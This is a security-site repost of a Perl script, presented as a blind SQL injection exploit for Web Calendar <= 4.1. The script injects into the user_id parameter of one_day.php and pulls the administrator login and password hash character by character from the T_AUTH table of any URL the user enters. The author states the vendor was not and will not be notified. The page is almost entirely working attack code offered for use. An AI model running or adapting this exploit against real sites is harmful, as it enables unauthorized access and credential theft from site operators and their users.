首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Web Calendar <= 4.1 Blind SQL Injection Exploit
来源:www.vfocus.net 作者:t0pP8uZz 发布时间:2008-04-23  
#!/usr/bin/perl

use strict;
use LWP::Simple;

print "-+--[ Web Calendar <= 4.1 Blind SQL Injection Exploit ]--+-\n";
print "-+--                                                   --+-\n";
print "-+--           Discovered && Coded By t0pP8uZz         --+-\n";
print "-+--             Discovered On: 24 April 2008          --+-\n";
print "-+--                                                   --+-\n";
print "-+-- Web Calendar suffers from a insecure mysql query  --+-\n";
print "-+--  the vendor has not been notified.. and wont be.. --+-\n";
print "-+--                                                   --+-\n";
print "-+--          Exploit tested in ActivePerl             --+-\n";
print "-+--                                                   --+-\n";
print "-+--[ Web Calendar <= 4.1 Blind SQL Injection Exploit ]--+-\n";

print "\nEnter URL (ie: http://site.com/webcal/): ";
chomp(my $url=<STDIN>);

print "\n\nInjecting Please Wait..\n\n"

my $lop = 1;
my $num = 48;
my $sub = 1;
my $res = undef;
my $content = undef;

while($lop) {

$content = get($url."/one_day.php?user_id=1 AND ASCII(SUBSTRING((SELECT CONCAT(login,char(58),password,char(94)) FROM T_AUTH WHERE role_id=1 LIMIT 0,1),".$sub.",1))=".$num."/*");

if($content !~ /you are not in database/i && $num == 94) { $lop = 0; }
elsif($content !~ /you are not in database/i) { $res .= chr($num); $num = 48; $sub++; print $res."\n"; }
else { $num++; }
}

print "\nExploit Successfull! Admin Details Are: ".$res;

# Coded by t0pP8uZz

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·RedDot CMS 7.5 (LngId) Remote
·Zune Software ActiveX Arbitrar
·Adobe Album Starter 3.2 Unchec
·YouTube Clone Script (spages.p
·SubEdit Player build 4066 subt
·又见0day! [FlashGet]-FG2CatchU
·PHP-Fusion 6.00.307 Remote Bli
·DivX Player 6.7 SRT File Subti
·OpenInvoice 0.9 Arbitrary Chan
·HP Software Update (Hpufunctio
·DivX Player 6.6.0 SRT File SEH
·VLC 0.8.6d httpd_FileCallBack
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved